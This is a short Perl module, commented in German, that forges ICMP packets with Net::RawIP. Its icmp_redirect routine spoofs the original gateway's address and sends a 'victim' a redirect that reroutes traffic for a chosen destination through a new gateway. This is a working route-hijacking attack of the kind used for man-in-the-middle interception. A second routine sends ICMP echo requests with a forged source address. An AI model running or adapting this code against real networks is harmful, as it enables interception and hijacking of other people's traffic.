package Icmp;

use Net::RawIP;
use NetAddr::IP;
use NetPacket::IP;

# Redirect-Message, bergeben werden IP-Addressen als Strings
# $victim: Opfer dem eine neue Route gesetzt werden soll
# $alter_gw: IP des ursprnglichen Gateways
# $neuer_gw: IP des neuen Gateway fr die spezielle Route
# $ziel_der_route: Ziel IP fr die eine Route gesetzt werden soll

sub icmp_redirect {
	my ($victim, $alter_gw, $neuer_gw, $ziel_der_route) = @_;
	my $a, $ip, $ip_gw, $ip_gw_int;
	my @quad;
	
	# neuer Gateway
	@quad = split(/\./, $neuer_gw);
	$ip_gw = new NetAddr::IP "$quad[3].$quad[2].$quad[1].$quad[0]";
	$ip_gw_int = $ip_gw->numeric();

	# Hier wird das "ursprngliche" IP-Paket zusammengebastelt
	# der geforderte 64 Bit Payload kann weggelassen werden

	$ip = NetPacket::IP->decode('');
	$ip->{ver}      = 4;
	$ip->{src_ip}   = $victim;
	$ip->{dest_ip}  = $ziel_der_route;

	# jetzt das ICMP-Redirect Paket konstruieren

	$a = new Net::RawIP(
	{
		ip => {
			saddr   => $alter_gw,
			daddr   => $victim,
		},
		icmp => {
			type    => 5,
			code    => 1,
			# encode() berechnet angeblich die IP-Headechecksumme neu
			data    => $ip->encode(),
			gateway => $ip_gw_int 
		}
	}
	);

	# und ab aufs Kabel
	$a->send(0, 1);
	
	return 1;
}

sub echo_request {
	my ($from, $to) = @_;
	my $a;

	$a = new Net::RawIP(
	{
		ip => {
			saddr   => $from,
			daddr   => $to,
		},
		icmp => {
			type    => 8,
			code    => 0,
		}
	}
	);
	$a->send(0, 1);
	return 1;
}

1;
